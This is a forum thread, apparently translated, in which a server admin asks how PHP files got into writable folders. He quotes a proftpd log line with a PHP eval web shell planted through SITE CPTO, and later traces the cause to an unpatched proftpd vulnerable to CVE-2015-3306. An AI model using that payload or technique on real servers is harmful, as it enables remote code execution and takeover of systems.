Hacked files infos.php, infs.php, infosof.php, how and where?

P

Pavel K2016-04-07 02:03:46

ubuntu

Pavel K, 2016-04-07 02:03:46

Greetings!
On the server today, files with the following content fell into open folders for writing:

proftpd: 93.83.111.21:51918: SITE cpto /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD;?>

Fortunately, the server was configured and nothing terrible happened, but the question is - how and from where ??
PS proftpd version 1.3.6 (all packages are always up to date)

Reply

Answer the question

In order to leave comments, you need to log in

3 answer(s)

P

Pavel K, 2016-04-15
@PavelK

In general, the cant was mine. A long time ago, when the CVE-2015-3306 vulnerability came out, I updated proftpd from the sources, being too lazy to build the deb package. When the server was restarted, it was not the updated version that loaded, but the old one =(
in the end, I thought that I had 1.3.6, but actually 1.3.5 worked.

Y

Yuri Chudnovsky, 2016-04-07
@Frankenstine

Forgotten/forgotten your password? Smoke authentication logs :)

D

Dmitry, 2016-04-13
@Dit81

Trojans, viruses, weak guessable passwords... There are many ways. It is possible that the passwords for different services and sites will match...